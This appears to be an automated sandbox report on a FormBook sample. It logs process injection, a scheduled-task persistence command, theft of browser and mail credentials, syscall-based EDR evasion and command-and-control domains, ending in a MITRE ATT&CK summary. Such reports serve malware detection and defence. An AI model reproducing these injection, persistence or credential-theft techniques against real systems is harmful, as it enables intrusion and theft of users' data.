                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtSetInformationThread: Direct from: 0x77762ECC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtSetInformationProcess: Direct from: 0x77762C5C
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe protection: execute and read and write
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe protection: read write
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\systray.exe | Thread register set: target process: 1004
                Source: C:\Windows\SysWOW64\systray.exe | Thread APC queued: target process: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CCB008
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A92008
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp"
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe | Process created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ISaSZznjXcpoJ.exe, 00000016.00000002.2510545126.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000000.1500511336.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511565241.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: ISaSZznjXcpoJ.exe, 00000016.00000002.2510545126.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000000.1500511336.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511565241.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: ISaSZznjXcpoJ.exe, 00000016.00000002.2510545126.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000000.1500511336.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511565241.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
                Source: ISaSZznjXcpoJ.exe, 00000016.00000002.2510545126.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000000.1500511336.0000000001760000.00000002.00000001.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511565241.0000000000FC0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Queries volume information: C:\Users\user\Desktop\n2pGr8w21V.exe VolumeInformation
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Users\user\AppData\Roaming\uEugNEto.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\systray.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\systray.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (numbers in front of a technique are the report's match counts for that technique):

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 612 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Abuse Elevation Control Mechanism | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 612 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                Behavior Graph ID: 1588691 | Sample: n2pGr8w21V.exe | Start date: 11/01/2025 | Architecture: WINDOWS | Score: 100

                Start (node 2)
                  DNS/IP: www.zrinorem-srumimit.sbs; www.lovel.shop; 9 other IPs or domains
                  Signatures: Suricata IDS alerts for network traffic; Sigma detected: Scheduled temp file as task from temp location; Multi AV Scanner detection for submitted file; 5 other signatures
                  10 n2pGr8w21V.exe [7] (started)
                    Dropped: C:\Users\user\AppData\Roaming\uEugNEto.exe (PE32); C:\Users\...\uEugNEto.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmpB98D.tmp (XML); C:\Users\user\AppData\...\n2pGr8w21V.exe.log (ASCII)
                    Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Writes to foreign memory regions; Allocates memory in foreign processes; Adds a directory exclusion to Windows Defender
                    16 RegSvcs.exe (started)
                      Signature: Maps a DLL or memory area into another process
                      29 ISaSZznjXcpoJ.exe (injected)
                        Signature: Found direct / indirect Syscall (likely to bypass EDR)
                        42 systray.exe [13] (started)
                          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                          45 ISaSZznjXcpoJ.exe (injected)
                            DNS/IP: duskgazes.work 15.197.148.33, ports 49994, 49995, 49996 (TANDEMUS, United States); hayaniya.org 192.185.147.100, ports 49986, 49987, 49988 (OIS1US, United States); 4 other IPs or domains
                            Signature: Found direct / indirect Syscall (likely to bypass EDR)
                          49 firefox.exe (started)
                    19 powershell.exe [23] (started)
                      Signature: Loading BitLocker PowerShell Module
                      32 conhost.exe (started)
                      34 WmiPrvSE.exe (started)
                    21 powershell.exe [23] (started)
                      36 conhost.exe (started)
                    23 schtasks.exe [1] (started)
                      38 conhost.exe (started)
                  14 uEugNEto.exe [5] (started)
                    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
                    25 schtasks.exe [1] (started)
                      40 conhost.exe (started)
                    27 RegSvcs.exe (started)

                Source | Detection | Scanner | Label | Link
                n2pGr8w21V.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                n2pGr8w21V.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\uEugNEto.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Roaming\uEugNEto.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook |
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
